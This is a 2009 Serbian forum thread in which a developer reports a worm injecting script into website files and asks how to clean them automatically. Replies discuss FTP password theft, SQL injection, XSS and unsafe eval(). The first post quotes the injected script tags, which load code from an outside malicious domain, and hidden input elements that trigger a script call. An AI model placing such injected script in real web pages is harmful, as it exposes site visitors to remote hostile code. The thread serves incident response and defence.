• Naslovna
• FAQ
• Pravilnik
• O ES-u
• Tim
• Korisnici
• Statistike

 

• elitesecurity ::
• elitemadzone ::
• EMAIL ::
• RSS ::
• ES Mobile

  Niste ulogovani?  Username :   Password:   

• Registracija
• Zaboravili ste password?
• Flashback ▲▼
• Login problem?

 

Pretraga:

 

Srodne teme 20.05.2006. Baza podataka za butik 11.12.2004. Sta je User Admin SBB-a hteo da kaze? 20.03.2005. kako staviti svoju web stranicu na mail 07.04.2005. Knjiga Combustion - Na Prodaju Nova 17.10.2005. Sigurnost podataka na lokalnom disku ili web mailu 25.02.2006. web mail - sta mi je potrebno? 08.05.2006. Povezivanje dva racunara preko IP adrese 16.06.2006. Yahoo filtrira poruke sa novog hosta kao spam, po.. 10.03.2007. nova ovde, imam pitanje 07.01.2007. snimanje slika od web kamera preko mesendzer? Navigacija Brisanje liste Aktuelne teme u ovom forumu: Uloga korisnika u zaštiti operativnog.. Pojavljuje se prozor za translate kada.. rootkit, kako ga se rešiti? zashtita programa !!!! Fceabook problem sa autentifikacijom l.. Cerber3 ransomware Nepoznati Intermediate Certificate Kako da resim ovaj problem Kako da deinstaliram windows defender .. Oonn virus pomoc api backend Eset Maliciozni softver otvara neželjene s.. Ransomware, ncov ekstenzija fajla [FREE] Komercijalan software za zašti.. Ransomware kao oblik malicioznog softv.. Izaberite forum: Linux Linux aplikacije Linux desktop okruženja Linux hardware Windows desktop Windows aplikacije Zaštita Office Windows drajveri Office :: Word Office :: Excel Macintosh Mac hardware Mac software Iphone Enterprise Networking SOHO Networking Wireless Windows mreže Linux mreže Wireless :: WiMax Wireless :: Mikrotik Wireless :: Wireless oprema Linux/UNIX serveri i servisi Unix BSD Skript jezici Security Virtualizacija Cloud Computing Services Security :: Kriptografija i enkripcija .NET 3D programiranje Art of Programming Asembler C/C++ programiranje Kernel i OS programiranje Pascal / Delphi / Kylix Java Embedded sistemi Perl PHP Python Visual Basic 6 Veštačka inteligencija Security Coding XML GameDev - Razvoj Igara Ostali programski jezici PHP :: PHP za početnike PHP :: Smarty template engine .NET :: .NET Desktop razvoj .NET :: ASP.NET .NET :: WPF Programiranje C/C++ programiranje :: C/C++ za početnike Baze podataka MySQL Oracle Access MS SQL Firebird/Interbase PostgreSQL Fiksna telefonija VoIP Udruženje korisnika teleko.. GSM - telefoni GSM - upotreba GSM - servisiranje Mreže i novosti Smartphone Mreže i novosti :: Mobilni internet Mreže i novosti :: Telenor - korisnički servis Mreže i novosti :: VIP - korisnički servis Mreže i novosti :: MTS - korisnički servis Smartphone :: Symbian OS Smartphone :: Windows Mobile Smartphone :: Android GSM - telefoni :: Nokia PDA Uređaji GPS Portable Players Anonimnost i privatnost ISP Browseri E-mail Instant Messaging FTP Google Hosting ISP :: Wireless mreže i ISP ISP :: ADSL E-mail :: Anti-spam Instant Messaging :: IRC Hosting :: Domeni Google :: Gmail E-Marketing Web aplikacije Web dizajn i CSS Web dizajn softver Web razvoj Pretraživači i SEO Flash Javascript i AJAX Web dizajn i CSS :: Kritike Grafički dizajn Izdavaštvo 3D modelovanje Rasterska grafika Vektorska grafika 3D modelovanje :: CAD/CAM Matične ploče, procesori .. Video karte i monitori Storage Ostali hardver Overclocking & Modding PC Konfiguracije Laptopovi Vodič za kupovinu - PC har.. Tablet PC Muzička produkcija Audio kompresija Audio softver Video produkcija Video kompresija Video softver Multimedijalni uređaji Digitalni fotoaparati Digitalne kamere Home Theater Digitalni fotoaparati :: Fotografija Digitalni fotoaparati :: Vodič za kupovinu - Digita.. Elektronika Elektrotehnika Elektronika :: TV uređaji Elektronika :: Radio elektronika i tehnika Elektronika :: Mikrokontroleri Elektronika :: Audio-elektronika Auto-elektronika :: Tuning Vodič za učenje Vodič za posao Vodič za emigraciju Fizika Matematika Nauka Sertifikati Informatika Vodič za učenje :: Seminarski radovi Vodič za učenje :: Obrazovne institucije Vodič za emigraciju :: Život u USA Vodič za emigraciju :: Život u Norveškoj Vodič za emigraciju :: Život u Nemačkoj E-Poslovanje E-Kupovina IT pravo i politika razvoja IT događaji IT berza poslova IS i ERP Ekonomija Berza Cryptocoins IT berza poslova :: Arhiva IT berze poslova IT pravo i politika razvoja :: Registar Nacionalnog ID E-Poslovanje :: E-Transakcije E-Poslovanje :: Forex E-Kupovina :: Platne kartice Digitalna Televizija Advocacy Ankete Predlozi i pitanja Vesti Čekaonica Vesti :: ES leto manifestacija MadZone TechZone Poljoprivreda AutoZone MotoZone Svakodnevnica Video igre MadZone :: Zanimljivi linkovi MadZone :: Kultura TechZone :: Ergonomija TechZone :: Grejanje TechZone :: Klimatizacija TechZone :: Bela tehnika AutoZone :: Fiat Panda club Lista poslednjih: 16, 32, 64, 128 poruka.

Mister_rap SE at Viacom Član broj: 8822 Poruke: 2540 *.dynamic.sbb.rs. Jabber: mister_rap@jabber.com +21 Profil Nova web napast (sad smo malo inteligentniji) 22.10.2009. u 12:18 - pre 189 meseci Pozdrav, Evo upravo sam suocen sa novom varijantom crva koja napada web stranice, sada nije u pitanju iframe attack. I nisu napadu izlozeni samo index fajlovi, vec i mnogi drugi, a koliko sam primjetio uspjesno napada sve extenzije (jsp, htm, html, phtml, php, js...). Takodje kreira fajlove samostalno (uocio sam video_player.sfw player.swf i tako redom). Ciscenje zarazenog sajta se prtvara u nocnu moru ako se ide rucno jer je zarazen jako velik broj fajlova. Trazio sam po google-u ali nisam nista nasao, tako da ajde da postujem ovdje da vidim da necemo doci do nekog zajednickog resenja. Evo sta dodaje u stranice: Code: <script src=http://topofthelinesunglasses.com/ext/add_checkout_success.php ></script> Code: document.write('<script src=http://topofthelinesunglasses.com/ext/add_checkout_success.php ><\/script>'); Pazi ovaj: Code: <input type="hidden" id="gwProxy"><!--Session data--></input><input type="hidden" id="jsProxy" onclick="jsCall();" /> I neke standardne enkodirane printove. Trenutno za sada mi je prijavljen samo 1 sajt, ali ne bi me cudilo da ih bude jos. Ono sto me zanima jeste kako se efikasno zastiti, i kako cistiti ove fajlove automatizovano!? Odgovor na temu

magna86 Anti Malware Fighter Član broj: 189287 Poruke: 557 Sajt: www.mycity.rs/Ambulanta +16 Profil Re: Nova web napast (sad smo malo inteligentniji) 23.10.2009. u 02:10 - pre 189 meseci Ja ti samo mogu pomoci ( ako treba) da zasigurno detektujes i uklonis bilo koji malware sa racunara ...a vezano za ciscenje zarazenog sajta...u to se ja nerazumem Ako ti je ipak potrebna moja pomoc vezano za to (vezano za crv/worm)...ovo je najefikasniji nacin za proveru,pa ako ti i to treba... *Iskljuci AntiVirus http://www.bleepingcomputer.com/forums/topic114351.html *Skini Combofix na Desktop http://www.elitesecurity.org/t...e-programa-HijackThis-ComboFix *Pokreni ga,prati uputstvo i na kraju skeniranja napravice se log (tipicna lokacija: C:\ComboFix.txt ) e..sad kao sto rekog..za ciscenje sajta...sorry http://www.itfix.biz/images/Malware.JPG Odgovor na temu

valjan Janko Valencik Software Deployer Schneider Electric Novi Sad Moderator Član broj: 158605 Poruke: 3531 *.adsl.eunet.rs. +553 Profil Re: Nova web napast (sad smo malo inteligentniji) 23.10.2009. u 08:27 - pre 188 meseci Crvi po svojoj prirodi koriste propuste u operativnim sistemima i aplikacijama. Problem kod slozenijih dinamickih websajtova je sto imas jako mnogo slojeva koje moras da stitis - najpre je tu tvoj hosting provajder (ako ne hostujes na svom serveru), i od toga koliko azurno krpi operativni sistem, sam web servis, sql server, PHP/.NET/Perl/Ruby/Javu ili sta vec tera sajt, i koliko su jake lozinke svih korisnika na sistemu (ceo sistem je bezbedan do nivoa najslabije lozinke) zavisi jedan segment bezbednosti. Ako provajder ima lenjog/nepouzdanog/neodgovornog/neobavestenog admina, menjaj ga (mislim na provajdera, ne na admina :-) ). Zatim je tu zastita lozinki za admin autentifikaciju koje se unose direktno na sajtu ili za ftp pristup sa racunara webmastera, odnosno svih onih koji uploaduju sadrzaj na server i koji imaju admin privilegije. Kao sto smo videli proteklih nekoliko meseci, nikakva enkripcija lozinki za ftp u starim verzijama Total Commandera dovela je do masovnih iframe napada - trojanac je tiho & elegantno maznjavao lozinke sa racunara webmastera koji su koristili stare verzije TC-a, slao na odgovarajuce mesto, i onda je crvic u kratkom vremenskom roku pomocu tih lozinki odradio ostatak posla. Dakle, bez dobre visestepene AV zastite i firewalla na racunarima webmastera/administratora/ostalih kreatora sajta nema dobre prevencije. Tu su zatim i programerske greške tipa SQL Injection, XSS Scripting i slicni propusti - ako sam pises sve od nule, onda tebi pada na grbacu da sve proveris i zakrpis (mada sada ima sve vise alata koji ti mogu pomoci u testiranju i pronalazenju ovakvih propusta), a ako koristis neki gotov CMS, onda naravno moras redovno skidati i ubacivati zakrpe (ako nema zakrpa duze vreme, pocni da razmisljas o prelasku na neki drugi CMS) ili da sam customizujes skripte, ali onda kasnije imas problema kod ubacivanja nekih novijih zakrpa. Problem je sto se ovakve vrste gresaka retko izucavaju na klasicnim programerskim kursevima, pa mnogi web programeri ni ne znaju sta je to SQL Injection ili XSS Scripting i kako ga spreciti. Na primer, vidjao sam kod ljudi koji razbijaju JavaScript, da sadrzaj nekog polja iz forme direktno utrpaju u eval() funkciju bez ikakve provere - to radi posao koji je on zamislio, ali mozes mu ukucati i koju god hoces java funkciju u to polje i bice izvrsena, a niko ih nikad nije ucio da to tako ne treba i zasto ne treba. Ima sigurno jos stvari, ovo mi je prvo palo na pamet, a vec sam se dovoljno raspisao... edit: zaboravih lozinke na SQL serveru - kad sam dosao u novu firmu, dva meseca sam se skoro bezuspesno borio sa trojancima i crvima dok nismo ukapirali da nam upadaju preko SQL servera, jer su ljudi pre nas ostavili blanko admin lozinku (tako im bilo lakse za izradu i odrzavanje)... Odgovor na temu

Mister_rap SE at Viacom Član broj: 8822 Poruke: 2540 *.dynamic.sbb.rs. Jabber: mister_rap@jabber.com +21 Profil Re: Nova web napast (sad smo malo inteligentniji) 23.10.2009. u 11:30 - pre 188 meseci Pozdrav, Prevenstveno hvala na odgovorima. Sa prethodnom varijantom bilo se lako izboriti, ali kao sto vec rekoh ovaj je malo napredniji. Imajuci u vidu da web aplikacije na kojima radim imaju gomilu fajlova prilicno je nemoguce bez neke automatizacije izvsiti ciscenje. Ovaj crv je takodje 99% upao preko ftp-a ne, premda ni hosting provajder po mom licnom misljenju ne valja nista. Ja kao developer ne mogu puno da uticem na stvari, tako da cu vratiti backup aplikacije promjeniti lozinke i to je to, to ce defacto pomoci - uvijek pomogne ali je pitanje do kad! Webmasteri su takodje upoznati sa tim da su oni vrlo vjerovatno nosioci virusa ali boze moj ljudski faktor u krajnjem nije moguce sprijeciti a to je ono sto ja pokusavam :D Odgovor na temu